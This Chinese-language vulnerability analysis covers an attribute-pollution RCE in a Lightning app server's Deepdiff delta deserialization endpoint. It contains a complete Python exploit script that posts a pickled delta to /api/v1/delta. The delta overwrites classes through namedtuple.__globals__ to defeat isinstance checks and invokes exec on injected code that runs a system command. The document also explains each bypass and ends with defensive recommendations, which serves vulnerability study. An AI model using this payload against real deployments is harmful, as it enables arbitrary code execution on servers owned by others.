某系统因属性污染导致的RCE漏洞分析
字数 1305 2025-08-20 18:17:53
属性污染导致的RCE漏洞分析与利用
漏洞概述
本漏洞是通过反序列化操作污染类和属性,最终导致远程代码执行(RCE)的安全问题。该漏洞存在于一个使用Deepdiff进行反序列化的系统中,攻击者能够绕过反序列化限制,包括魔术方法和白名单机制,通过任意属性写入实现代码执行。
漏洞原理
核心机制
- 反序列化入口:系统通过
/api/v1/delta接口接收JSON数据,其中的delta参数会被反序列化 - 属性污染:反序列化后的数据被用来动态修改类和对象的属性
- 路径解析:系统通过解析特殊格式的路径字符串来定位和修改目标属性
关键技术点
- 通过
namedtuple的__globals__属性获取全局命名空间 - 利用路径解析机制动态修改关键类和属性
- 绕过多个
isinstance类型检查 - 最终通过
__call__魔术方法执行任意代码
漏洞利用步骤
1. 构造恶意payload
import requests, time, pickle, pickletools
from collections import namedtuple
from ordered_set import OrderedSet
def send_delta(d):
requests.post(server_host + '/api/v1/delta', headers={
'x-lightning-type': '1',
'x-lightning-session-uuid': '1',
'x-lightning-session-id': '1'
}, json={"delta": d})
# Monkey patch OrderedSet reduce to make it easier to pickle
OrderedSet.__reduce__ = lambda self, *args: (OrderedSet, ())
server_host = 'http://127.0.0.1:7501'
command = 'dir'
# 注入的恶意代码
injected_code = f"__import__('os').system('calc.exe')" + '''
import lightning, sys
from lightning.app.api.request_types import _DeltaRequest, _APIRequest
lightning.app.core.app._DeltaRequest = _DeltaRequest
from lightning.app.structures.dict import Dict
lightning.app.structures.Dict = Dict
from lightning.app.core.flow import LightningFlow
lightning.app.core.LightningFlow = LightningFlow
LightningFlow._INTERNAL_STATE_VARS = {"_paths", "_layout"}
lightning.app.utilities.commands.base._APIRequest = _APIRequest
del sys.modules['lightning.app.utilities.types']'''
bypass_isinstance = OrderedSet
delta = {
'attribute_added': {
"root['function']": namedtuple,
# 绕过_collect_deltas_from_ui_and_work_queues中的isinstance(delta, _DeltaRequest)
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.app._DeltaRequest": str,
# 绕过_process_requests中的isinstance(request, _APIRequest)
"root['bypass_isinstance']": bypass_isinstance,
"root['bypass_isinstance'].'__instancecheck__'": str,
"root['function'].'__globals__'['_sys'].modules['lightning.app'].utilities.commands.base._APIRequest": bypass_isinstance(),
# 绕过get_component_by_name中的isinstance(current, LightningDict)
"root['function'].'__globals__'['_sys'].modules['lightning.app'].structures.Dict": dict,
# 绕过get_component_by_name中的if not isinstance(child, ComponentTuple):
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.LightningFlow": bypass_isinstance(),
"root['function'].'__globals__'['_sys'].modules['typing'].Union": list,
# 防止前面程序报错将`provided_state["vars"]`覆盖为空
"root['vars']": {},
# 或者将`_INTERNAL_STATE_VARS`覆盖为空
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.flow.LightningFlow._INTERNAL_STATE_VARS": (),
# 设置最终执行的函数和参数
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.name": "root.__init__.__builtins__.exec",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.method_name": "__call__",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.args": (injected_code,),
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.kwargs": {},
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.id": "root"
}
}
payload = pickletools.optimize(pickle.dumps(delta, 1)).decode() \
.replace('__builtin__', 'builtins') \
.replace('unicode', 'str')
# 发送payload进行属性污染
send_delta(payload)
# 稍等确保payload被处理
time.sleep(0.2)
send_delta({}) # 触发代码执行
2. 关键绕过技术
(1) 绕过isinstance(delta, _DeltaRequest)检测
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.app._DeltaRequest": str
将_DeltaRequest类覆盖为str类,使isinstance(delta, _DeltaRequest)返回False
(2) 绕过isinstance(request, _APIRequest)检测
bypass_isinstance = OrderedSet
"root['bypass_isinstance']": bypass_isinstance,
"root['bypass_isinstance'].'__instancecheck__'": str,
"root['function'].'__globals__'['_sys'].modules['lightning.app'].utilities.commands.base._APIRequest": bypass_isinstance(),
利用OrderedSet并设置__instancecheck__属性,使所有isinstance检查返回True
(3) 绕过isinstance(child, ComponentTuple)检测
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.LightningFlow": bypass_isinstance(),
"root['function'].'__globals__'['_sys'].modules['typing'].Union": list,
将LightningFlow覆盖为OrderedSet,Union覆盖为list,绕过类型检查
(4) 绕过isinstance(current, LightningDict)检测
"root['function'].'__globals__'['_sys'].modules['lightning.app'].structures.Dict": dict,
将LightningDict类覆盖为普通dict类
3. 防止报错的两种方法
# 方法1: 将provided_state["vars"]覆盖为空
"root['vars']": {},
# 方法2: 将_INTERNAL_STATE_VARS覆盖为空
"root['function'].'__globals__'['_sys'].modules['lightning.app'].core.flow.LightningFlow._INTERNAL_STATE_VARS": (),
4. 最终代码执行
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.name": "root.__init__.__builtins__.exec",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.method_name": "__call__",
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.args": (injected_code,),
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.kwargs": {},
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.id": "root"
通过__call__方法调用exec执行任意代码
技术细节分析
1. 路径解析机制
系统使用_path_to_elements函数解析路径字符串,例如:
"root['function'].'__globals__'['_sys'].modules['lightning.app'].api.request_types._DeltaRequest.test6"
会被解析为:
(('root', 'GETATTR'), ('function', 'GET'), ('__globals__', 'GETATTR'), ('_sys', 'GET'), ('modules', 'GETATTR'), ('lightning.app', 'GET'), ('api', 'GETATTR'), ('request_types', 'GETATTR'), ('_DeltaRequest', 'GETATTR'), ('test6', 'GETATTR'))
2. 属性设置机制
系统通过_set_new_value方法动态设置属性:
def _simple_set_elem_value(self, obj, path_for_err_reporting, elem=None, value=None, action=None):
try:
if action == GET:
obj[elem] = value
elif action == GETATTR:
setattr(obj, elem, value)
except (KeyError, IndexError, AttributeError, TypeError) as e:
self._raise_or_log('Failed to set {} due to {}'.format(path_for_err_reporting, e))
3. 反序列化白名单绕过
虽然系统有反序列化白名单,但通过以下方式绕过:
- 使用白名单内的类(如
namedtuple) - 通过
__globals__获取全局命名空间 - 动态修改关键类和属性
防御建议
- 严格限制反序列化:避免反序列化不可信数据,或使用更安全的序列化格式
- 加强类型检查:不要仅依赖
isinstance进行安全检查 - 限制属性访问:对动态属性访问进行严格控制
- 使用不可变类:关键类应设计为不可变,防止运行时修改
- 最小权限原则:运行服务的账户应具有最小必要权限
总结
该漏洞展示了如何通过精心构造的反序列化数据,利用系统的路径解析和属性设置机制,绕过多个安全检查,最终实现任意代码执行。攻击者通过污染关键类和属性,改变了系统的正常行为流程,展示了属性污染类漏洞的强大威力。